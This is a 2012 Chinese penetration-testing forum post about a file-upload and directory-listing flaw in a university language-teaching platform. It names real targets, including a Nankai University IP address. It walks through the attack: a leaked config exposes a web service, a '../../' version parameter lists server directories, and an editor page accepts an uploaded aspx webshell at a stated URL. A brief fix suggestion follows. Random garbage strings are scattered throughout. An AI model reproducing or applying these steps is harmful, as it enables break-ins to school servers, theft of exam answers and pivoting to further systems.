中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
( G- F6 H$ g+ I- _$ G$ G
  X/ a9 K8 a* S9 f# I详细说明：
; z" R( B2 v" Z( I. |4 G1 W5 o
以南开大学的为例:
http://222.30.60.3/NPELS
3 r) E  q1 `% `NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
8 t2 {7 j8 j9 H: }- Z<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
/ y2 S) D, [- S! T' x</setting>
及版本号
3 j9 ]: |' j) f- P( d- ]; S8 j<add key="TVersion" value="1, 0, 0, 2187">
9 ^5 O! x+ B/ I, H</add>
( }2 N4 [/ {: l0 h- w7 [+ k, i直接访问
7 f6 ^7 K4 G2 n  X4 c" Dhttp://222.30.60.3/NPELS/CommonService.asmx
. g( @+ ^+ ~/ I使用GetTestClientFileList操作，直接 HTTP GET 列目录：
  t" S+ V! t1 Ehttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
; ?; Z3 s5 e* O进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 E( F4 M2 r& z+ o! \0 _! w
5 P; k( E2 }. O# {; f' ]6 P发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
# L) j" p, H+ j# V) @/ j
' |: O0 b' d4 y3 ROOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

6 b& }" [7 U/ S, f0 X" [  ]1 _- g列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
http://222.30.60.3/npelsv/editor/editor.htm
$ \  W1 P6 U# J/ g* g
( i- S& e9 ]) n1 f0 N+ E" s上传木马：
6 ?4 `; }$ r4 E1 Q: k( u- x, Fhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
; H8 U; O$ z5 @2 j
修复方案：
7 e' K9 H- z1 n1 @/ D. B好像考试系统必须使用 CommonService.asmx
1 p5 {; A6 x. X# Y最好配置文件加密或者用别的方式不让它泄露出来
, q* P  [, Q4 ~, S, \8 F并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2